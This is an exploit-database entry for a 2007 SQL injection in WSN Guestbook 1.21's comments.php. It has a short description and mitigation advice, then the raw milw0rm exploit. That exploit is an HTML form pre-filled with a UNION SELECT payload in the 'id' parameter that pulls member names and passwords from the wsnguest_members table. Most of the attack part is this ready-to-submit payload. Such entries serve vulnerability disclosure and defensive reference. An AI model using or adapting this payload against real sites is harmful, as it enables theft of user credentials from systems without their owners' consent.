header-logo
Suggest Exploit
vendor:
WSN Guestbook
by:
UniquE-Key{UniquE-Cracker}
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: WSN Guestbook
Affected Version From: WSN Guest 1.21
Affected Version To: WSN Guest 1.21, WSN Guest 1.02
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WSN Guest 1.21 Version Comments.PHP “ID” SQL Injection Exploit

The WSN Guest 1.21 version of the Comments.PHP script is vulnerable to SQL Injection. This can be exploited by an attacker to inject malicious SQL code into the 'id' parameter of the script. The exploit allows the attacker to retrieve sensitive information from the database, such as usernames and passwords of the WSN Guestbook members.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

<!--

WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-14}

Product / Vendor :

WSN Guestbook

http://scripts.webmastersite.net/wsnguest/

Bug :

http://localhost/script/comments.php?id=-SQL Inj.-

SQL Injection Exploit :

-->

<title>WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit</title>
<body bgcolor="#000000">
<form name="entryform" method="get" action="http://localhost/script/comments.php">
<table width="500" border="0" align="center">
<font face="Verdana" size="2" color="#FF0000"><b>WSN Guest 1.21 Version Comments.PHP "ID" SQL Injection Exploit</b></font>
<br>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">SQL Injection Code</td>
    <td>&nbsp;</td>
    <td><input name="id" type="text" value="-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*" class="inputbox" style="color: #000000" style="width:300px; "></td>
  </tr>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
    <td>&nbsp;</td>
    <td>
      <select name="">
        <option>(ALL)</option>
      </select>&nbsp;
      <input type="submit" value="Apply">
    </td>
  </tr>
</table>
</form>
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>

<!--

Tested :

WSN Guest 1.21

Vulnerable :

WSN Guest 1.21

WSN Guest 1.02

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

-->

# milw0rm.com [2007-03-14]